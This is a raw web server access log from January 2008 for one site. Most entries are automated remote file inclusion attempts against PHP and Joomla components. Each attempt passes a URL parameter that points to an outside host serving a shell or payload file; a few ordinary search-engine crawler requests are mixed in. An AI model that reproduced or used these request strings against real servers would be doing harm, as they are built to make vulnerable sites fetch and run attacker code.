64.185.237.143 - - [25/Jan/2008:07:41:24 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:07:41:24 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.233.151.53 - - [25/Jan/2008:07:41:36 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.151.53 - - [25/Jan/2008:07:41:36 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.151.53 - - [25/Jan/2008:07:41:36 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.151.53 - - [25/Jan/2008:07:41:37 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.151.53 - - [25/Jan/2008:07:41:37 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.151.53 - - [25/Jan/2008:07:41:37 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:41:54 -0800] "GET /logs/access_070709.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:42:06 -0800] "GET /logs/access_070921.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:43:48 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:43:48 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:43:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:07:44:15 -0800] "GET /cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.40.52 - - [25/Jan/2008:07:44:16 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.40.52 - - [25/Jan/2008:07:44:17 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.40.52 - - [25/Jan/2008:07:44:18 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:45:23 -0800] "GET /logs/access_071112.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:45:24 -0800] "GET /logs/access_070807.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:45:33 -0800] "GET /logs/access_071205.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
193.138.249.220 - - [25/Jan/2008:07:45:36 -0800] "GET /cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/company/_notes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.189.4.131 - - [25/Jan/2008:07:45:43 -0800] "GET /1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.172.172 - - [25/Jan/2008:07:45:51 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "ia_archiver" "www.dmulk.com"
64.208.172.172 - - [25/Jan/2008:07:45:51 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "ia_archiver" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:07:46:17 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=inurlhttp://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.18.141.2 - - [25/Jan/2008:07:46:34 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:46:39 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:46:39 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:07:46:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.89.144 - - [25/Jan/2008:07:47:11 -0800] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.portailromand.ch/components/com_content/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.89.144 - - [25/Jan/2008:07:47:11 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.portailromand.ch/components/com_content/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:47:44 -0800] "GET /logs/access_080104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:48:19 -0800] "GET /logs/access_071230.log/index.php?pageurl=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:48:20 -0800] "GET /index.php?pageurl=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:48:20 -0800] "GET /logs/index.php?pageurl=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.90.136 - - [25/Jan/2008:07:48:48 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:48:54 -0800] "GET /logs/access_070805.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
193.138.249.220 - - [25/Jan/2008:07:50:04 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crownvisioncenter.com/company/_notes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.138.249.220 - - [25/Jan/2008:07:50:04 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crownvisioncenter.com/company/_notes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.90 - - [25/Jan/2008:07:50:24 -0800] "GET /logs/access_071225.log/////////////////////?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [25/Jan/2008:07:50:25 -0800] "GET /////////////////////?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2981 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [25/Jan/2008:07:50:26 -0800] "GET /logs/////////////////////?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 31707 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Jan/2008:07:50:56 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:07:52:09 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.189.4.131 - - [25/Jan/2008:07:52:46 -0800] "GET /logs/access_071224.log/1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [25/Jan/2008:07:52:46 -0800] "GET /logs/1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:53:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.33 - - [25/Jan/2008:07:54:05 -0800] "GET /tmp/?M=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.249.220 - - [25/Jan/2008:07:54:29 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crownvisioncenter.com/company/_notes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:54:45 -0800] "GET /logs/access.log/index.php?pageurl=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:07:55:07 -0800] "GET /logs/access.log/cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.186 - - [25/Jan/2008:07:55:08 -0800] "GET /logs/cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:55:10 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:55:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:55:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:55:39 -0800] "GET /logs/access_080104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:55:49 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.1" 200 1814141 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:07:56:11 -0800] "GET /logs/access_070913.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:57:01 -0800] "GET /logs/access_080104.log//phpAdsNew/view.inc.php?phpAds_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:57:02 -0800] "GET //phpAdsNew/view.inc.php?phpAds_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:57:02 -0800] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.206 - - [25/Jan/2008:07:57:32 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.206 - - [25/Jan/2008:07:57:32 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:07:57:48 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:07:58:04 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:58:26 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:58:27 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:58:27 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.50.50.4 - - [25/Jan/2008:07:58:38 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:59:21 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:59:22 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:07:59:22 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:07:59:23 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:08:01:00 -0800] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.29.32 - - [25/Jan/2008:08:01:11 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:08:01:34 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:08:01:34 -0800] "GET /errors.php?error=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:02:16 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:02:17 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:02:17 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:31 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:34 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.57.162 - - [25/Jan/2008:08:02:36 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.32.57.162 - - [25/Jan/2008:08:02:36 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:39 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:02:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:02:55 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.215 - - [25/Jan/2008:08:03:02 -0800] "GET /cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:03:49 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:08:03:56 -0800] "GET /logs//administrator/components/com_slideshow1/admin.slideshow1.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:08:03:56 -0800] "GET //administrator/components/com_slideshow1/admin.slideshow1.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:04:04 -0800] "GET /logs/access_071225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:04:04 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:04:05 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.86.86 - - [25/Jan/2008:08:04:09 -0800] "GET /logs/access.log/cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.3.86.86 - - [25/Jan/2008:08:04:10 -0800] "GET /logs/cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:04:12 -0800] "GET /logs/access_080112.log//index.php?Inc_Dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:04:16 -0800] "GET //index.php?Inc_Dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:04:22 -0800] "GET /logs//index.php?Inc_Dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:04:22 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:04:23 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:04:23 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:04:35 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:04:46 -0800] "GET /logs/access_080104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.32.57.162 - - [25/Jan/2008:08:05:20 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.32.57.162 - - [25/Jan/2008:08:05:21 -0800] "GET /index.php?mosConfig_absolute_path=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:05:29 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:08:05:51 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:08:05:51 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:08:05:51 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:08:07:37 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=inurlhttp://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
152.157.32.252 - - [25/Jan/2008:08:07:37 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=inurlhttp://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.10.8 - - [25/Jan/2008:08:07:45 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:07:50 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:07:51 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.123.115.125 - - [25/Jan/2008:08:07:51 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:07:51 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
